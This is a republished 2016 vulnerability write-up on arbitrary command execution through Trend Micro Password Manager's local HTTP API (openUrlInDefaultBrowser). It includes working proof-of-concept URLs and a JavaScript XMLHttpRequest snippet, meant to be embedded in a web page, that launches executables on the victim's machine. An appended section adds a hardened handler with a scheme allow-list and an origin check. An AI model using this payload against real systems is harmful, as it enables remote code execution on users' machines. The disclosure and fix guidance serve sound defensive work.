Trend Micro Password Manager arbitrary command execution vulnerability verification - Vulnerabilities and Early Warning - The Black Bar Safety Net (myhack58)

2016-01-16T00:00:00
ID MYHACK58:62201671066
Type myhack58
Reporter 阿尔法实验室 (Alpha Lab) kernux
Modified 2016-01-16T00:00:00

Description

The Windows edition of Trend Micro's antivirus suite bundles a password management program; the same program is also offered on the official website as a standalone free download. After a default installation of the latest Trend Micro:

[Figure 1]

the password management program can be found under Data Security. It is enabled by default, and a local listening port can be seen:

[Figure 2]

Here the listening port is 49153, while Google's analysis reported 49155, so the port is evidently chosen from a range. The service is an HTTP server written in Node.js, and the following URL carries an arbitrary command execution vulnerability:

<https://localhost:49153/api/openUrlInDefaultBrowser?url=cmd>

This API was intended to open a web page in the default browser:

[Figure 3]

However, it will also open a path on the local file system:

[Figure 4]

which in turn lets it open a file under that path:

[Figure 5]

Finally, even executable files are launched without complaint; the function is remarkably powerful:

<https://localhost:49153/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe>

[Figure 6]

The impact is that an attacker only needs to embed a request like the following in a web page the victim visits (the request is cross-origin, but the browser still sends it, and the local server acts on it regardless of the response):

```javascript
x = new XMLHttpRequest();
x.open("GET", "https://localhost:49153/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe", true);
try { x.send(); } catch (e) {}
```

to execute arbitrary commands on any Windows system with Trend Micro installed; the harm can be imagined.
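The root cause described above (the `url` parameter is handed to the operating system unchecked, and the API answers requests from any web page) can be reproduced and fixed in a few lines. The following is an added example written for this page, not Trend Micro's code or the original author's PoC: a function that models the vulnerable behaviour, and a hardened handler that (1) allow-lists the URL scheme and (2) refuses cross-origin browser requests. The function names, the `TRUSTED_ORIGIN` value and the status codes are assumptions made for illustration; the launcher is injected so the logic runs without opening anything.

```javascript
// Added example, not Trend Micro's code. Models the API described in the
// write-up (/api/openUrlInDefaultBrowser?url=...) and a hardened version.

// Vulnerable behaviour as observed: the raw query parameter is what gets
// handed to the OS "open" facility, so a path such as
// c:/windows/system32/calc.exe is launched as a program. Returns the value
// instead of launching it so it can be inspected.
function vulnerableOpenTarget(rawUrl) {
  return rawUrl; // no validation at all
}

// Hardened parameter check. Only absolute http(s) URLs may be opened.
// Caveat: new URL("c:/windows/system32/calc.exe") parses successfully with
// protocol "c:" (a drive letter looks like a scheme), so "does it parse as a
// URL" is NOT a sufficient test; the scheme must be compared to an allow-list.
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

function decideOpen(rawUrl) {
  let parsed;
  try {
    parsed = new URL(rawUrl); // throws for relative strings such as "cmd"
  } catch (e) {
    return { allowed: false, reason: "not an absolute URL" };
  }
  if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) {
    return { allowed: false, reason: "scheme " + parsed.protocol + " not allowed" };
  }
  return { allowed: true, target: parsed.href };
}

// Cross-site check. The PoC fires the request from the attacker's page, so the
// browser attaches that page's origin in the Origin header. Assumed policy:
// accept only requests with no Origin (a non-browser client) or the product's
// own origin. TRUSTED_ORIGIN is a hypothetical value for this example.
const TRUSTED_ORIGIN = "https://localhost:49153";

function originAllowed(originHeader) {
  return originHeader === undefined || originHeader === TRUSTED_ORIGIN;
}

// Hardened handler: both checks must pass before `launcher` is called.
// `query` is the parsed query string, `headers` the lower-cased request
// headers, `launcher` the function that would hand the URL to the browser.
function handleOpenUrl(query, headers, launcher) {
  if (!originAllowed(headers.origin)) {
    return { status: 403, reason: "cross-origin request refused" };
  }
  const decision = decideOpen(query.url || "");
  if (!decision.allowed) {
    return { status: 400, reason: decision.reason };
  }
  launcher(decision.target);
  return { status: 200, target: decision.target };
}
```

Two points worth keeping in mind when applying this to a real local-listener API: the origin check alone is weak if the trusted origin is guessable and the same listener also serves the product's own pages, so a per-session secret token is the usual complement; and the launch step itself must not route the validated URL through a shell (for instance `cmd /c start`), because characters that are legal in a URL query string are also `cmd.exe` metacharacters.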